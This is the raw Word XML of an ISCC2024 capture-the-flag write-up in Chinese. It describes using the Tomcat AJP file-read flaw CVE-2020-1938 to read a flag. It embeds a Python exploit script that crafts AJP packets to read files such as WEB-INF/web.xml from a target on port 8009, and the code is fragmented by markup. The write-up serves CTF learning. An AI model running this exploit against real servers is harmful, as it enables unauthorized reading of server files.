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69B05" w14:textId="323E53EA" w:rsidR="00311B85" w:rsidRDefault="00000000" w:rsidP="005038D0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SCC2024 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WriteUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005038D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB9792" w14:textId="77777777" w:rsidR="00311B85" w:rsidRPr="005038D0" w:rsidRDefault="00000000" w:rsidP="005038D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005038D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>AB_C 刘子博 3627634696@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22A5FC" w14:textId="7257B937" w:rsidR="00311B85" w:rsidRPr="005038D0" w:rsidRDefault="00261A2E" w:rsidP="005038D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>练武题</w:t>
      </w:r>
      <w:r w:rsidR="000732CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46AEC2" w14:textId="5036C297" w:rsidR="00311B85" w:rsidRDefault="00000000" w:rsidP="005038D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E84B1B" w14:textId="54631537" w:rsidR="00311B85" w:rsidRDefault="00195CEC" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web3原神启动:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D24A9" w14:textId="66DC38C4" w:rsidR="008833D2" w:rsidRDefault="008833D2" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入flag得到flag在flag中，路径添加发现报</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008833D2">
        <w:t>Apache Tomcat/8.5.32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C55991" w14:textId="77777777" w:rsidR="00ED20E1" w:rsidRDefault="00411890" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oogle搜索发现存在文件包含和文件读取漏斗，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95928A" w14:textId="303F15F1" w:rsidR="00ED20E1" w:rsidRDefault="00ED20E1" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F398042" wp14:editId="70215838">
            <wp:extent cx="5274310" cy="2556510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1789061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1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4498" w14:textId="0909DDFB" w:rsidR="00411890" w:rsidRDefault="00411890" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们的目标是获得flag漏斗exp显示是AJP协议存在缺陷</w:t>
      </w:r>
      <w:r w:rsidR="00FF547E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00FF547E" w:rsidRPr="00FF547E">
        <w:t>Java的WEB默认目录WEB-INF</w:t>
      </w:r>
      <w:r w:rsidR="00EF4426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，猜测flag.txt路径可能</w:t>
      </w:r>
      <w:r w:rsidR="00894257">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00894257" w:rsidRPr="00894257">
        <w:t>CVE-2020-1938</w:t>
      </w:r>
      <w:r w:rsidR="00894257">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4229D8" w14:textId="55FB3E5B" w:rsidR="003F0788" w:rsidRDefault="006B7E93" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229415DB" wp14:editId="3BA217C9">
            <wp:extent cx="5274310" cy="2620645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="134498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919" w14:textId="725ECC49" w:rsidR="006624B6" w:rsidRDefault="006624B6" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>读取成功:</w:t>
      </w:r>
      <w:r w:rsidRPr="006624B6">
        <w:t xml:space="preserve"> ISCC{TS@Soad30NwDMy98}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0AD432" w14:textId="109D4895" w:rsidR="00A3540F" w:rsidRDefault="00A3540F" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4191AF" w14:textId="77777777" w:rsidR="000732CC" w:rsidRPr="000732CC" w:rsidRDefault="000732CC" w:rsidP="000732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</w:pP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#!/usr/bin/env python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>#CNVD-2020-10487  Tomcat-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Ajp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ydhcui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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import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import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socket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argparse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from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io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BytesIO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Some references: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># https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html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s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is None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-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l =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H%dsb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% l, l,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s.encode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'utf8'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),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unpack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(stream,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fmt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size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struct.calcsize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fmt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buf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stream.read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(size)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struct.unpack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fmt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buf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size,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size == -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null string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return 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res,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"%ds"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% size)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stream.read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)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\0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NotFoundException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Exception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pass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class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AjpBodyRequest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object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server == web server, container == servlet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SERVER_TO_CONTAINER, CONTAINER_TO_SERVER =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range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2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MAX_REQUEST_LENGTH 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8186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data_stream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data_direction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.data_stream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data_stream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lastRenderedPageBreak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.data_direction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data_direction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serialize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data =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.data_stream.read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AjpBodyRequest.MAX_REQUEST_LENGTH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(data) ==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bbH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0x12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0x34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0x00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res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(data))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res += data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.data_direction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AjpBodyRequest.SERVER_TO_CONTAINER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header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bbH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0x12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0x34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(res))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header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bbH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0x41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0x42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(res))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header + res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send_and_receive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socket, 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while True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data =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.serialize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socket.send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(data)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AjpResponse.receive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while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!=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AjpResponse.GET_BODY_CHUNK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and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!=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AjpResponse.SEND_HEADERS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AjpResponse.receive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AjpResponse.SEND_HEADERS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or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(data) ==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break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class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object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_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY =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range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28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REQUEST_METHODS = {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'GET'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GET,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'POST'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POST,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'HEAD'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HEAD,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'OPTIONS'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OPTIONS,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'PUT'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PUT,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'DELETE'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DELETE,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'TRACE'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 TRACE}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server == web server, container == servlet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SERVER_TO_CONTAINER, CONTAINER_TO_SERVER =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range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2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COMMON_HEADERS = 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"SC_REQ_ACCEPT"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"SC_REQ_ACCEPT_CHARSET"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"SC_REQ_ACCEPT_ENCODING"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"SC_REQ_ACCEPT_LANGUAGE"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"SC_REQ_AUTHORIZATION"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"SC_REQ_CONNECTION"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"SC_REQ_CONTENT_TYPE"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"SC_REQ_CONTENT_LENGTH"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"SC_REQ_COOKIE"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"SC_REQ_COOKIE2"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"SC_REQ_HOST"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"SC_REQ_PRAGMA"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"SC_REQ_REFERER"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lastRenderedPageBreak/>
        <w:t>"SC_REQ_USER_AGENT"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ATTRIBUTES = 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"context"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servlet_path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remote_user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auth_type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query_string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"route"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ssl_cert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ssl_cipher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ssl_session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req_attribute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ssl_key_size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"secret"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stored_method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data_direction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0x02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.method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.protocol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.remote_addr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.remote_host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.server_name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.server_port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.is_ssl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.num_headers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.attributes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.data_direction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data_direction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pack_headers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.num_headers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.num_headers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h_name.startswith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"SC_REQ"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code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AjpForwardRequest.COMMON_HEADERS.index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) +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"BB"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0xA0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code)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pack_attributes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= </w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A5C261"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b""</w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A5C261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attr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.attributes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attr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'name'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code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AjpForwardRequest.ATTRIBUTES.index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) +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"b"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code)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req_attribute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aa_name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a_value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attr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'value'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aa_name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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        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a_value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attr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'value'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"B"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0xFF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serialize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"bb"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.method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.protocol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.remote_addr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.remote_host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.server_name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.server_port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"?"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.is_ssl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.pack_headers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+=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.pack_attributes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.data_direction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AjpForwardRequest.SERVER_TO_CONTAINER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header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bbh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0x12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0x34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(res))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header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struct.pack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bbh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0x41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0x42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(res))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header + res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parse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raw_packet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stream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BytesIO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raw_packet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.magic1, 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.magic2,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bbH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.method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"bb"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.protocol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.remote_addr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.remote_host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.server_name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.server_port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.is_ssl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"?"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.num_headers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{}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in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range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.num_headers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code,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code &gt;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0xA000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AjpForwardRequest.COMMON_HEADERS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[code -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0xA001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"%ds"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% code)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stream.read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)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\0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h_value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h_value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send_and_receive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socket, stream,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save_cookies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 = []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6F737A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000732CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6F737A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socket.sendall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.serialize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.method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AjpForwardRequest.POST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AjpResponse.receive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assert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AjpResponse.SEND_HEADERS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res.append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(r)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save_cookies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and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'Set-Cookie'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r.response_headers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'SC_REQ_COOKIE'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r.response_headers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'Set-Cookie'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read body chunks and end response packets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while True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AjpResponse.receive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res.append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(r)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AjpResponse.END_RESPONSE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break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AjpResponse.SEND_BODY_CHUNK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continue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47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Handle the unknown prefix code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"Handling unknown prefix code 47"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Add custom handling logic here if needed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continue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    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"Unknown prefix code: {}"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.format(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NotImplementedError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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object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_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK =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range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7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COMMON_SEND_HEADERS = [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"Content-Type"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"Content-Language"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"Content-Length"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"Date"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"Last-Modified"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"Location"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"Set-Cookie"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"Set-Cookie2"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"Servlet-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lastRenderedPageBreak/>
        <w:t>Engine"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"Status"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"WWW-Authenticate"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parse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read headers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.magic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.data_length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HHb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AjpResponse.SEND_HEADERS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.parse_send_headers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AjpResponse.SEND_BODY_CHUNK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.parse_send_body_chunk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AjpResponse.END_RESPONSE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.parse_end_response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AjpResponse.GET_BODY_CHUNK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.parse_get_body_chunk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47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.parse_custom_prefix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"Unknown prefix code: {}"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.format(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.prefix_code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NotImplementedError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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parse_send_headers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.http_status_code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.http_status_msg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.num_headers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.response_headers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{}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in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range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.num_headers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code,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code &lt;=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0xA000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custom header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"%ds"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% code)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stream.read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)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\0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h_value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else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AjpResponse.COMMON_SEND_HEADERS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[code-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0xA001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h_value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unpack_string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.response_headers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h_value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parse_send_body_chunk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.data_length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stream.read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.data_length+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parse_end_response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.reuse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"b"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lastRenderedPageBreak/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parse_get_body_chunk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= unpack(stream,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"&gt;H"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parse_custom_prefix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Custom parsing logic for prefix code 47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"Parsing custom prefix code 47"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# Read and log the remaining data in the stream (for debugging)</w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC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remaining_data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stream.read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"Remaining data for custom prefix 47: {}"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.format(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remaining_data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B3AE60"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@staticmethod</w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roma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receive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AjpResponse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r.parse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(stream)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prepare_ajp_forward_request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method=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AjpForwardRequest.GET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AjpForwardRequest.SERVER_TO_CONTAINER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fr.method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method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fr.protocol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"HTTP/1.1"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fr.remote_addr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fr.remote_host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fr.server_name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fr.server_port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80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{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'SC_REQ_ACCEPT'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'text/html'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'SC_REQ_CONNECTION'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'keep-alive'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'SC_REQ_CONTENT_LENGTH'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'0'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'SC_REQ_HOST'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'SC_REQ_USER_AGENT'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'Mozilla'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'Accept-Encoding'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gzip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, deflate, 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sdch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'Accept-Language'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en-US,en;q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=0.5'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'Upgrade-Insecure-Requests'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'1'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'Cache-Control'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'max-age=0'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fr.is_ssl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fr.attributes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[]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fr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lastRenderedPageBreak/>
        <w:br/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class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Tomcat(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object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0732C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.target_port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.socket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socket.socket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socket.AF_INET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socket.SOCK_STREAM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.socket.setsockopt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socket.SOL_SOCKET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socket.SO_REUSEADDR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.socket.connect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target_port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.stream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.socket.makefile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rb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bufsize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0732CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="56A8F5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>perform_request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headers={}, method=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'GET'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user=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password=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attributes=[]):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.forward_request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prepare_ajp_forward_request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method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AjpForwardRequest.REQUEST_METHODS.get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(method))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"Getting resource at ajp13://%s:%d%s"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% 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.target_host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.target_port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req_uri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user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is not None and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password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is not None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.forward_request.request_headers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'SC_REQ_AUTHORIZATION'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] =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"Basic "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+ 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"%s:%s"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% (user, password)).encode(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'base64'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).replace(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\n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for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h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headers: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.forward_request.request_headers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[h] = headers[h]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for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a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attributes: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.forward_request.attributes.append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(a)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responses =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.forward_request.send_and_receive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.socket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.stream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(responses) ==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return None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None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snd_hdrs_res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responses[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data_res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responses[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:-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data_res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) == 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"No data in response. Headers:%s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\n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%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snd_hdrs_res.response_headers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snd_hdrs_res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data_res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'''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javax.servlet.include.request_uri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javax.servlet.include.path_info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javax.servlet.include.servlet_path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lastRenderedPageBreak/>
        <w:t>'''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parser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argparse.ArgumentParser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parser.add_argument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"target"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type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str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help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"Hostname or IP to attack"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parser.add_argument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'-p'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'--port'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type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default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8009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help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"AJP port to attack (default is 8009)"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parser.add_argument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"-f"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'--file'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type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str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default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'WEB-INF/web.xml'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help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"file path :(WEB-INF/web.xml)"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args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parser.parse_args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>t = Tomcat(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args.target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args.port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_,data = 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t.perform_request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'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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asdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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attributes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=[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'name'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'req_attribute'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'value'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'javax.servlet.include.request_uri'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'/'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]},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'name'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'req_attribute'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'value'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'javax.servlet.include.path_info'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,args.file]},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'name'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'req_attribute'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'value'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:[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'javax.servlet.include.servlet_path'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'/'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]},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])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'----------------------------'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0732C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0732CC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""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.join([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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d.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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for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d </w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC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in </w:t>
      </w:r>
      <w:r w:rsidRPr="000732CC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data]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10534094" w14:textId="3408E676" w:rsidR="00CA4763" w:rsidRDefault="00CA4763" w:rsidP="005038D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CA4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31944" w14:textId="77777777" w:rsidR="00AC02CA" w:rsidRDefault="00AC02CA" w:rsidP="005038D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4861F163" w14:textId="77777777" w:rsidR="00AC02CA" w:rsidRDefault="00AC02CA" w:rsidP="0050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3E730" w14:textId="77777777" w:rsidR="00AC02CA" w:rsidRDefault="00AC02CA" w:rsidP="005038D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05EA5738" w14:textId="77777777" w:rsidR="00AC02CA" w:rsidRDefault="00AC02CA" w:rsidP="00503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FjYmY1OWNjMzAwOTg0YTA2YTAzMGE5NGM2YWE1ZDcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00E50877"/>
    <w:rsid w:val="00010D7F"/>
    <w:rsid w:val="000732CC"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00195CEC"/>
    <w:rsid w:val="00261A2E"/>
    <w:rsid w:val="002A58C0"/>
    <w:rsid w:val="00311B85"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F0788"/>
    <w:rsid w:val="00411890"/>
    <w:rsid w:val="00423A17"/>
    <w:rsid w:val="004E4B60"/>
    <w:rsid w:val="004F2AD9"/>
    <w:rsid w:val="005038D0"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006624B6"/>
    <w:rsid w:val="006B7E93"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="007D07A8"/>
    <w:rsid w:val="00824B4B"/>
    <w:rsid w:val="008833D2"/>
    <w:rsid w:val="00894257"/>
    <w:rsid w:val="00994318"/>
    <w:rsid w:val="00A3540F"/>
    <w:rsid w:val="00A544D4"/>
    <w:rsid w:val="00AC02CA"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CA4763"/>
    <w:rsid w:val="00DA3AFD"/>
    <w:rsid w:val="00DF06C1"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00ED20E1"/>
    <w:rsid w:val="00EF4426"/>
    <w:rsid w:val="00FF547E"/>
    <w:rsid w:val="0869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D8AA9"/>
  <w15:docId w15:val="{4A7F73CD-FD5C-42AB-A322-70C81182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5038D0"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195CEC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页眉 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00195CEC"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00195CEC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脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00195CEC"/>
    <w:rPr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73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32C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2011</Words>
  <Characters>11464</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>95</Lines>
  <Paragraphs>26</Paragraphs>
  <ScaleCrop>false</ScaleCrop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洧光 刘</dc:creator>
  <cp:lastModifiedBy>Saturate Nil</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-18T12:35:00Z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09CEE8B7FC8F42D8ACD0D0915254EE24_12</vt:lpwstr>
  </property>
</Properties>
</file>